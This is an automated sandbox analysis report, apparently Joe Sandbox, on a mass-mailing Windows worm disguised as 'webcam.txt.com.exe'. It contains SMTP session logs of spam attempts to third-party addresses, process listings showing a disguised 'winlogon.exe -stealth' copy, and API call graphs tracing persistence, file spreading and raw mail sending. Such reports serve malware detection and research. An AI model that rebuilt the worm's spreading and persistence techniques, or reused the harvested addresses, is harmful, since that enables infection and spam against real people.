                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. i21-20020a05620a145500b0077d7d37d036si8779639qkl.687 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.760541916 CET2549767142.251.16.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. fe15-20020a05622a4d4f00b004254a3cdd6dsi4358025qtb.234 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.809653997 CET2549766142.251.167.26192.168.2.4550-5.7.1 [102.165.48.83] Gmail has detected that this message is not RFC 5322
                                                                                                                                                                                                          550-5.7.1 compliant:
                                                                                                                                                                                                          550-5.7.1 'From' header has non compliant domain name.
                                                                                                                                                                                                          550-5.7.1 To reduce the amount of spam sent to Gmail, this message has been
                                                                                                                                                                                                          550-5.7.1 blocked. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. gi4-20020a056214248400b0067ac4b8a125si2628884qvb.39 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.887720108 CET254976966.196.36.12192.168.2.4451-102.165.48.83 is not yet authorized to deliver mail from
                                                                                                                                                                                                          451 <sdx-cardview-caret-rtl@2x.png> to <tj@vision-media.ca>. Please try later.
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.051702976 CET254976966.196.36.12192.168.2.4421 kryten.reg.ca lost input connection
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.715734959 CET2549770142.251.167.26192.168.2.4220 mx.google.com ESMTP t4-20020a05620a450400b0077da2eda4a9si10214392qkp.705 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.715970039 CET4977025192.168.2.4142.251.167.26EHLO sitnik.ru
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.834898949 CET254977117.57.154.33192.168.2.4220 iCloud iscream SMTP proxy - p00-iscream-smtp-d759469dd-ss5bd 3.5.0 (2403B23-529c1e05a5df)
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.835134029 CET4977125192.168.2.417.57.154.33EHLO blakeembrey.com
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.853503942 CET2549770142.251.167.26192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.856446981 CET4977025192.168.2.4142.251.167.26MAIL FROM: <runtime@7.22.5>
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.984818935 CET254977117.57.154.33192.168.2.4250-p00-iscream-smtp-d759469dd-ss5bd
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-SIZE 28311552
                                                                                                                                                                                                          250-ETRN
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-AUTH LOGIN PLAIN ATOKEN
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-DSN
                                                                                                                                                                                                          250 CHUNKING
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.985162973 CET4977125192.168.2.417.57.154.33MAIL FROM: <purecatamphetamine@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.991285086 CET2549770142.251.167.26192.168.2.4250 2.1.0 OK t4-20020a05620a450400b0077da2eda4a9si10214392qkp.705 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.991462946 CET4977025192.168.2.4142.251.167.26RCPT TO: <andrey@sitnik.ru>
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.136010885 CET254977117.57.154.33192.168.2.4250 2.1.0 Ok
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.136115074 CET4977125192.168.2.417.57.154.33RCPT TO: <hello@blakeembrey.com>
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.238989115 CET2549770142.251.167.26192.168.2.4250 2.1.5 OK t4-20020a05620a450400b0077da2eda4a9si10214392qkp.705 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.239170074 CET4977025192.168.2.4142.251.167.26DATA
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.374867916 CET2549770142.251.167.26192.168.2.4354 Go ahead t4-20020a05620a450400b0077da2eda4a9si10214392qkp.705 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.649499893 CET254977117.57.154.33192.168.2.4550 5.7.1 Mail from IP 102.165.48.83 was rejected due to listing in Spamhaus SBL. For details please see http://www.spamhaus.org/query/bl?ip=102.165.48.83
                                                                                                                                                                                                          550 5.7.1 Mail from IP 102.165.48.83 was rejected due to listing in Spamhaus SBL. For details please see http://www.spamhaus.org/query/bl?ip=102.165.48.83
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.726624012 CET2549770142.251.167.26192.168.2.4550-5.7.1 [102.165.48.83] Gmail has detected that this message is not RFC 5322
                                                                                                                                                                                                          550-5.7.1 compliant:
                                                                                                                                                                                                          550-5.7.1 'From' header has non compliant domain name.
                                                                                                                                                                                                          550-5.7.1 To reduce the amount of spam sent to Gmail, this message has been
                                                                                                                                                                                                          550-5.7.1 blocked. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. t4-20020a05620a450400b0077da2eda4a9si10214392qkp.705 - gsmtp

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:12:56:37
                                                                                                                                                                                                          Start date:04/12/2023
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:25'353 bytes
                                                                                                                                                                                                          MD5 hash:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                          Start time:12:56:46
                                                                                                                                                                                                          Start date:04/12/2023
                                                                                                                                                                                                          Path:C:\Windows\winlogon.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Windows\winlogon.exe" -stealth
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:25'353 bytes
                                                                                                                                                                                                          MD5 hash:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:32.3%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:9.2%
                                                                                                                                                                                                            Total number of Nodes:433
                                                                                                                                                                                                            Total number of Limit Nodes:4
                                                                                                                                                                                                            execution_graph 2301 403b04 GetVersion 2323 404683 HeapCreate 2301->2323 2303 403b6f 2330 4044d8 2303->2330 2304 403b63 2304->2303 2403 403c1f 2304->2403 2309 403b88 2363 404159 2309->2363 2311 403b92 2371 4040a0 2311->2371 2313 403b97 2384 404048 2313->2384 2315 403bae GetModuleHandleA 2388 4030f9 GetTickCount 2315->2388 2324 4046a3 2323->2324 2325 4046b8 2323->2325 2416 404a37 RtlAllocateHeap 2324->2416 2325->2304 2328 4046bb 2328->2304 2329 4046ac HeapDestroy 2329->2325 2418 403c43 2330->2418 2334 404608 2335 403b78 GetCommandLineA 2334->2335 2337 40462f GetStdHandle 2334->2337 2342 4043a6 2335->2342 2336 4044f7 2336->2334 2339 403c43 5 API calls 2336->2339 2341 4045b4 2336->2341 2337->2334 2338 40463d GetFileType 2337->2338 2338->2334 2339->2336 2340 4045d6 GetFileType 2340->2341 2341->2334 2341->2340 2343 4043c1 GetEnvironmentStringsW 2342->2343 2344 4043f4 2342->2344 2345 4043d5 GetEnvironmentStrings 2343->2345 2346 4043c9 2343->2346 2344->2346 2347 4043e5 2344->2347 2345->2347 2357 4044ae 2345->2357 2348 404401 GetEnvironmentStringsW 2346->2348 2349 40440d WideCharToMultiByte 2346->2349 2350 404493 2347->2350 2351 404487 GetEnvironmentStrings 2347->2351 2347->2357 2348->2349 2348->2357 2353 404441 2349->2353 2354 404473 FreeEnvironmentStringsW 2349->2354 2355 403c43 5 API calls 2350->2355 2351->2350 2351->2357 2356 403c43 5 API calls 2353->2356 2354->2357 2355->2357 2358 404447 2356->2358 2357->2309 2358->2354 2359 404450 WideCharToMultiByte 2358->2359 2360 404461 2359->2360 2362 40446a 2359->2362 2471 403d1e 2360->2471 2362->2354 2364 40416b 2363->2364 2366 404170 2363->2366 2484 4057cf 2364->2484 2367 403c43 5 API calls 2366->2367 2369 4041b4 2367->2369 2368 4041c4 2368->2311 2369->2368 2370 403bfa 6 API calls 2369->2370 2370->2368 2372 4040ad 2371->2372 2374 4040b2 2371->2374 2373 4057cf 18 API calls 2372->2373 2373->2374 2375 403c43 5 API calls 2374->2375 2376 4040df 2375->2376 2377 403bfa 6 API calls 2376->2377 2381 4040f3 2376->2381 2377->2381 2378 404136 2379 403d1e 4 API calls 2378->2379 2380 404142 2379->2380 2380->2313 2381->2378 2382 403c43 5 API calls 2381->2382 2383 403bfa 6 API calls 2381->2383 2382->2381 2383->2381 2385 404051 2384->2385 2387 404056 2384->2387 2386 4057cf 18 API calls 2385->2386 2386->2387 2387->2315 2536 401d91 2388->2536 2390 403111 CreateMutexA GetLastError 2391 403134 2390->2391 2392 40313d WSAStartup 2390->2392 2409 403def 2391->2409 2537 402ea0 2392->2537 2394 403162 2579 4032d8 2394->2579 2396 403179 2397 40318d CreateThread CreateThread 2396->2397 2398 4031ba Sleep InternetGetConnectedState 2397->2398 2589 403085 GetCurrentThread SetThreadPriority 2397->2589 2594 402e37 GetCurrentThread SetThreadPriority 2397->2594 2398->2398 2401 4031d6 2398->2401 2399 40324a InternetGetConnectedState Sleep 2399->2401 2400 4031f7 GetExitCodeThread 2400->2401 2402 40321a CreateThread 2400->2402 2401->2398 2401->2399 2401->2400 2401->2402 2402->2401 2599 401e62 2402->2599 2404 403c28 2403->2404 2405 403c2d 2403->2405 2406 404890 6 API calls 2404->2406 2407 4048c9 6 API calls 2405->2407 2406->2405 2408 403c36 2407->2408 2408->2303 2781 403e11 2409->2781 2411 403bdb 2412 403ec4 2411->2412 2413 403ed0 2412->2413 2414 403ff9 UnhandledExceptionFilter 2413->2414 2415 403bec 2413->2415 2414->2415 2417 4046a8 2416->2417 2417->2328 2417->2329 2427 403c55 2418->2427 2421 403bfa 2422 403c03 2421->2422 2423 403c08 2421->2423 2453 404890 2422->2453 2459 4048c9 2423->2459 2428 403c52 2427->2428 2430 403c5c 2427->2430 2428->2336 2428->2421 2430->2428 2431 403c81 2430->2431 2432 403c94 2431->2432 2433 403c8e 2431->2433 2435 403ca0 RtlAllocateHeap 2432->2435 2436 403cb5 2432->2436 2437 404dcb 2433->2437 2435->2436 2436->2430 2441 404dfd 2437->2441 2438 404e9c 2440 404eab 2438->2440 2449 405185 2438->2449 2440->2432 2441->2438 2441->2440 2443 4050d4 2441->2443 2444 405117 RtlAllocateHeap 2443->2444 2448 4050e7 2443->2448 2445 40513d VirtualAlloc 2444->2445 2447 405167 2444->2447 2446 405157 HeapFree 2445->2446 2445->2447 2446->2447 2447->2438 2448->2444 2448->2447 2450 405197 VirtualAlloc 2449->2450 2452 4051e0 2450->2452 2452->2440 2454 40489a 2453->2454 2455 4048c7 2454->2455 2456 4048c9 6 API calls 2454->2456 2455->2423 2457 4048b1 2456->2457 2458 4048c9 6 API calls 2457->2458 2458->2455 2461 4048dc 2459->2461 2460 4049f3 2462 404a06 GetStdHandle WriteFile 2460->2462 2461->2460 2463 40491c 2461->2463 2465 403c11 2461->2465 2462->2465 2463->2465 2466 4057eb 2463->2466 2465->2336 2467 4057f8 LoadLibraryA 2466->2467 2468 40583a 2466->2468 2467->2468 2469 405809 GetProcAddress 2467->2469 2468->2465 2469->2468 2470 405820 GetProcAddress GetProcAddress 2469->2470 2470->2468 2472 403d27 2471->2472 2473 403d4b 2471->2473 2474 403d33 2472->2474 2475 403d3d RtlFreeHeap 2472->2475 2473->2362 2478 404aa0 2474->2478 2475->2473 2477 403d39 2477->2362 2479 404ae7 2478->2479 2480 404cd9 VirtualFree 2479->2480 2483 404d93 2479->2483 2481 404d3d 2480->2481 2482 404d4c VirtualFree HeapFree 2481->2482 2481->2483 2482->2483 2483->2477 2485 4057d8 2484->2485 2486 4057df 2484->2486 2488 40540b 2485->2488 2486->2366 2495 4055a4 2488->2495 2490 405598 2490->2486 2492 405462 2492->2490 2498 40564a GetCPInfo 2492->2498 2494 40544e GetCPInfo 2494->2492 2496 40541c 2495->2496 2497 4055b4 GetOEMCP 2495->2497 2496->2490 2496->2492 2496->2494 2497->2496 2499 405735 2498->2499 2500 40566d 2498->2500 2499->2490 2506 405280 2500->2506 2505 405bb5 9 API calls 2505->2499 2507 4052b1 GetStringTypeW 2506->2507 2509 4052c9 2506->2509 2507->2509 2510 4052cd GetStringTypeA 2507->2510 2508 405318 2513 4053b5 2508->2513 2514 40532e MultiByteToWideChar 2508->2514 2509->2508 2512 4052f4 GetStringTypeA 2509->2512 2510->2509 2510->2513 2512->2513 2518 405bb5 2513->2518 2514->2513 2515 405352 2514->2515 2515->2513 2516 40538c MultiByteToWideChar 2515->2516 2516->2513 2517 4053a5 GetStringTypeW 2516->2517 2517->2513 2519 405be5 LCMapStringW 2518->2519 2523 405c01 2518->2523 2520 405c09 LCMapStringA 2519->2520 2519->2523 2522 40570d 2520->2522 2520->2523 2521 405c4a LCMapStringA 2521->2522 2522->2505 2523->2521 2524 405c67 2523->2524 2524->2522 2525 405c7d MultiByteToWideChar 2524->2525 2525->2522 2526 405ca7 2525->2526 2526->2522 2527 405cdd MultiByteToWideChar 2526->2527 2527->2522 2528 405cf6 LCMapStringW 2527->2528 2528->2522 2529 405d11 2528->2529 2530 405d17 2529->2530 2532 405d57 2529->2532 2530->2522 2531 405d25 LCMapStringW 2530->2531 2531->2522 2532->2522 2533 405d8f LCMapStringW 2532->2533 2533->2522 2534 405da7 WideCharToMultiByte 2533->2534 2534->2522 2536->2390 2538 402ec2 GetWindowsDirectoryA 2537->2538 2539 402edc 2538->2539 2540 402f0b CopyFileA 2539->2540 2582 403640 2540->2582 2547 402e72 3 API calls 2548 402f94 2547->2548 2549 402e72 3 API calls 2548->2549 2550 402fa0 2549->2550 2551 402e72 3 API calls 2550->2551 2552 402fac RegDeleteKeyA 2551->2552 2553 402e72 3 API calls 2552->2553 2554 402fcb 2553->2554 2555 402e72 3 API calls 2554->2555 2556 402fd7 2555->2556 2557 402e72 3 API calls 2556->2557 2558 402fe3 2557->2558 2559 402e72 3 API calls 2558->2559 2560 402ff3 2559->2560 2561 402e72 3 API calls 2560->2561 2562 402fff 2561->2562 2563 402e72 3 API calls 2562->2563 2564 40300b 2563->2564 2565 402e72 3 API calls 2564->2565 2566 40301a 2565->2566 2567 402e72 3 API calls 2566->2567 2568 403026 2567->2568 2569 402e72 3 API calls 2568->2569 2570 403032 2569->2570 2571 402e72 3 API calls 2570->2571 2572 40303e 2571->2572 2573 402e72 3 API calls 2572->2573 2574 40304a RegDeleteKeyA RegDeleteKeyA 2573->2574 2575 402e72 3 API calls 2574->2575 2576 403071 2575->2576 2577 402e72 3 API calls 2576->2577 2578 40307d 2577->2578 2578->2394 2580 403c55 5 API calls 2579->2580 2581 4032e3 2580->2581 2581->2396 2583 402f33 RegOpenKeyA 2582->2583 2584 403720 2583->2584 2585 402f57 RegSetValueExA RegCloseKey 2584->2585 2586 402e72 RegOpenKeyA 2585->2586 2587 402e89 RegDeleteValueA RegCloseKey 2586->2587 2588 402e9e 2586->2588 2587->2588 2588->2547 2590 40309a GetLocalTime 2589->2590 2591 4030ef Sleep 2590->2591 2592 4030ab 2590->2592 2591->2590 2592->2591 2593 4030e0 Beep 2592->2593 2593->2591 2595 402e4c GetDriveTypeA 2594->2595 2596 402e59 2595->2596 2596->2595 2598 402e6c 2596->2598 2658 402cea 2596->2658 2600 401e6f 2599->2600 2601 401e99 2600->2601 2603 401e9b lstrcpy 2600->2603 2602 402785 2601->2602 2683 40156c GlobalAlloc GetNetworkParams 2601->2683 2603->2601 2605 401ec6 2605->2602 2606 401ed1 lstrcpy 2605->2606 2697 4037c5 2606->2697 2609 401f00 2610 401f1d htons socket setsockopt setsockopt connect 2609->2610 2611 401f87 2610->2611 2613 401f8e 2610->2613 2612 402778 closesocket 2611->2612 2612->2602 2700 401d9b 2613->2700 2615 402757 2616 40276a shutdown 2615->2616 2617 40379b 2 API calls 2615->2617 2616->2612 2618 402769 2617->2618 2618->2616 2619 401fea 2619->2615 2620 401d9b 2 API calls 2619->2620 2621 40204a 2620->2621 2622 402099 2621->2622 2623 401d9b 2 API calls 2621->2623 2622->2615 2624 401d9b 2 API calls 2622->2624 2623->2622 2625 4020ef 2624->2625 2625->2615 2626 401d9b 2 API calls 2625->2626 2627 402142 2626->2627 2627->2615 2628 401d9b 2 API calls 2627->2628 2630 402179 2628->2630 2629 40220d GetWindowsDirectoryA 2631 40222c 2629->2631 2630->2615 2630->2629 2633 4022fe 2630->2633 2706 4017ad CreateFileA 2631->2706 2724 401b67 GetLocalTime GetTimeZoneInformation 2633->2724 2635 402432 2636 402467 send 2635->2636 2637 402480 2636->2637 2638 40248c wsprintfA 2637->2638 2639 4024b8 2638->2639 2640 402522 send 2639->2640 2641 402541 2640->2641 2642 402596 send 2641->2642 2643 4025a9 2642->2643 2644 4025c0 send 2643->2644 2645 4025d9 2644->2645 2646 402658 send _lopen 2645->2646 2646->2615 2647 402680 2646->2647 2727 401cb2 2647->2727 2650 402697 _lclose 2651 4026a4 2650->2651 2653 4026b0 2650->2653 2733 40379b DeleteFileA 2651->2733 2654 401d9b 2 API calls 2653->2654 2655 40271a 2654->2655 2655->2615 2656 402728 2655->2656 2657 402749 send 2656->2657 2657->2615 2659 402d03 2658->2659 2660 402d14 FindFirstFileA 2659->2660 2661 402e34 2660->2661 2666 402d35 2660->2666 2661->2596 2662 402e17 FindNextFileA 2663 402e2d FindClose 2662->2663 2662->2666 2663->2661 2664 402db2 CharLowerBuffA 2664->2666 2666->2661 2666->2662 2666->2663 2666->2664 2668 402cea 17 API calls 2666->2668 2669 402c58 2666->2669 2673 402a51 2666->2673 2668->2666 2670 402c76 2669->2670 2671 402cc4 CopyFileA 2670->2671 2671->2670 2672 402ce7 2671->2672 2672->2666 2675 402a5e 2673->2675 2674 402c53 2674->2666 2675->2674 2676 402ab3 _lopen 2675->2676 2676->2674 2682 402aca 2676->2682 2677 402af4 _hread 2678 402c4a _lclose 2677->2678 2677->2682 2678->2674 2679 402b12 CharLowerBuffA 2679->2682 2680 4028a4 11 API calls 2680->2682 2681 402c16 _llseek 2681->2682 2682->2677 2682->2679 2682->2680 2682->2681 2684 4015c5 GetNetworkParams 2683->2684 2685 4015b5 GlobalAlloc 2683->2685 2686 4015d3 2684->2686 2692 401624 2684->2692 2685->2684 2736 4010a4 2686->2736 2689 4015ed 2690 40165c 2689->2690 2689->2692 2693 4010a4 15 API calls 2689->2693 2694 40168d 2690->2694 2755 401335 htons htons htons 2690->2755 2691 4010a4 15 API calls 2691->2692 2692->2690 2692->2691 2693->2689 2694->2605 2696 40168a 2696->2605 2698 403d1e 4 API calls 2697->2698 2699 401ee8 gethostbyname 2698->2699 2699->2602 2699->2609 2701 401dad 2700->2701 2705 401dcf 2700->2705 2703 401db7 send 2701->2703 2702 401deb recv 2704 401e56 2702->2704 2702->2705 2703->2704 2703->2705 2704->2619 2705->2702 2705->2704 2707 4017e3 2706->2707 2709 4019ce 2706->2709 2708 4017eb CreateFileA 2707->2708 2707->2709 2708->2709 2710 40180a 2708->2710 2709->2633 2710->2709 2775 4019e8 GetSystemTime 2710->2775 2714 40187e GetFileSize GetFileSize 2715 4018b0 WriteFile 2714->2715 2716 4018e1 WriteFile 2715->2716 2717 4018ef SetFilePointer 2716->2717 2718 401901 ReadFile 2717->2718 2719 401922 2718->2719 2720 401943 WriteFile 2718->2720 2719->2720 2721 401927 WriteFile 2719->2721 2722 40197b WriteFile 2720->2722 2721->2718 2723 401989 WriteFile 2722->2723 2723->2709 2725 401c1e wsprintfA 2724->2725 2725->2635 2729 401cc5 2727->2729 2728 401cca _hread 2728->2729 2729->2728 2730 401d44 send 2729->2730 2731 401d66 2729->2731 2732 401d0b send 2729->2732 2730->2729 2730->2731 2731->2615 2731->2650 2732->2729 2732->2731 2734 4037b1 2733->2734 2735 4037a9 GetLastError 2733->2735 2734->2653 2735->2734 2737 4010db 2736->2737 2738 4010f0 htons 2737->2738 2739 4010f5 getservbyname 2737->2739 2742 401113 inet_addr 2738->2742 2739->2738 2741 401109 2739->2741 2741->2742 2743 401128 gethostbyname 2742->2743 2744 40113f socket 2742->2744 2745 401135 2743->2745 2746 40115a 2743->2746 2747 401152 2744->2747 2748 40115e htons htons 2744->2748 2745->2744 2746->2747 2747->2689 2770 401000 2748->2770 2751 401225 recvfrom 2752 401243 WSAGetLastError 2751->2752 2753 401220 closesocket 2751->2753 2752->2753 2753->2747 2756 40139e 2755->2756 2757 401404 htons 2756->2757 2758 401419 2757->2758 2759 40142b htons 2757->2759 2758->2759 2760 40141e htons 2758->2760 2761 401437 2759->2761 2764 401447 2759->2764 2760->2759 2772 401268 2761->2772 2763 401458 htons 2765 4014ff htons 2763->2765 2768 40143f 2763->2768 2764->2696 2766 401514 inet_ntoa 2765->2766 2765->2768 2766->2768 2767 401541 htons 2767->2768 2768->2763 2768->2764 2768->2767 2769 4014cb htons 2768->2769 2769->2768 2771 401016 htons htons setsockopt setsockopt sendto 2770->2771 2771->2751 2771->2753 2773 4032d8 5 API calls 2772->2773 2774 40127c 2773->2774 2774->2768 2776 401866 2775->2776 2777 401a6d SetFilePointer 2776->2777 2778 401aa8 ReadFile 2777->2778 2779 401ae0 SetFilePointer 2778->2779 2780 401aae 2778->2780 2779->2714 2780->2778 2780->2779 2782 403e1d GetCurrentProcess TerminateProcess 2781->2782 2783 403e2e 2781->2783 2782->2783 2783->2411 2784 405cc9 2785 405cd8 2784->2785 2786 405cdd MultiByteToWideChar 2785->2786 2790 405d43 2785->2790 2787 405cf6 LCMapStringW 2786->2787 2786->2790 2788 405d11 2787->2788 2787->2790 2789 405d17 2788->2789 2791 405d57 2788->2791 2789->2790 2792 405d25 LCMapStringW 2789->2792 2791->2790 2793 405d8f LCMapStringW 2791->2793 2792->2790 2793->2790 2794 405da7 WideCharToMultiByte 2793->2794 2794->2790 2806 40537d 2807 405384 2806->2807 2808 4053b5 2807->2808 2809 40538c MultiByteToWideChar 2807->2809 2809->2808 2810 4053a5 GetStringTypeW 2809->2810 2810->2808 2811 405d7d 2812 405d8b 2811->2812 2813 405d43 2812->2813 2814 405d8f LCMapStringW 2812->2814 2814->2813 2815 405da7 WideCharToMultiByte 2814->2815 2815->2813 2796 403bef 2803 403e00 2796->2803 2799 403c08 2801 4048c9 6 API calls 2799->2801 2800 404890 6 API calls 2800->2799 2802 403c11 2801->2802 2804 403e11 2 API calls 2803->2804 2805 403bfa 2804->2805 2805->2799 2805->2800

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 456 402cea-402d2f call 403630 call 403640 FindFirstFileA 461 402e34-402e36 456->461 462 402d35-402d38 456->462 462->461 463 402d3e-402d45 462->463 464 402d54-402d5b 463->464 465 402d47-402d4e 463->465 467 402d73-402dca call 403630 call 403640 * 2 call 403720 CharLowerBuffA 464->467 468 402d5d-402d64 464->468 465->464 466 402e17-402e27 FindNextFileA 465->466 466->463 471 402e2d-402e2e FindClose 466->471 479 402dcc-402de1 call 403800 467->479 480 402dfe-402e05 call 402a51 467->480 468->467 469 402d66-402d6d 468->469 469->466 469->467 471->461 485 402df0-402df7 call 402cea 479->485 486 402de3-402dea call 402c58 479->486 483 402e0a-402e15 480->483 483->466 483->471 490 402dfc 485->490 489 402def 486->489 489->485 490->483
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,?,00408890), ref: 00402D25
                                                                                                                                                                                                            • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?,00408890), ref: 00402DBD
                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010,?,?,?,?,?,?,?,?,?,?,00408890), ref: 00402E1F
                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,00408890), ref: 00402E2E
                                                                                                                                                                                                              • Part of subcall function 00402A51: _lopen.KERNEL32(?,00000000), ref: 00402AB8
                                                                                                                                                                                                              • Part of subcall function 00402A51: _hread.KERNEL32(?,?,00001000), ref: 00402AF4
                                                                                                                                                                                                              • Part of subcall function 00402A51: CharLowerBuffA.USER32(00000000,00000000), ref: 00402B1B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$BuffCharFileLower$CloseFirstNext_hread_lopen
                                                                                                                                                                                                            • String ID: .$.$\*.*$shar
                                                                                                                                                                                                            • API String ID: 350507150-3271563406
                                                                                                                                                                                                            • Opcode ID: 5fc5424881c6c12c193400b34dfb33e230c5c2a2005d26602844cd16e9d60960
                                                                                                                                                                                                            • Instruction ID: af0736c58c016ddeb0cabaee310bdccb81470b733d605c7cd839ae1c487058f6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fc5424881c6c12c193400b34dfb33e230c5c2a2005d26602844cd16e9d60960
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14311E7284066C6ADF25AA65CD4DBDF766C6B04309F1404FBE609F21C1E6BC8BC44E69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 491 401b67-401c1c GetLocalTime GetTimeZoneInformation 492 401c23-401c29 491->492 493 401c1e-401c21 491->493 494 401c2b 492->494 495 401c2d-401c32 492->495 493->492 494->495 496 401c34 495->496 497 401c3a-401c3f 495->497 496->497 498 401c41 497->498 499 401c47-401c4c 497->499 498->499 500 401c54-401c5b 499->500 501 401c4e 499->501 502 401c62-401cb1 wsprintfA 500->502 503 401c5d 500->503 501->500 503->502
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00401BF9
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(00000000), ref: 00401C0D
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00401CA5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
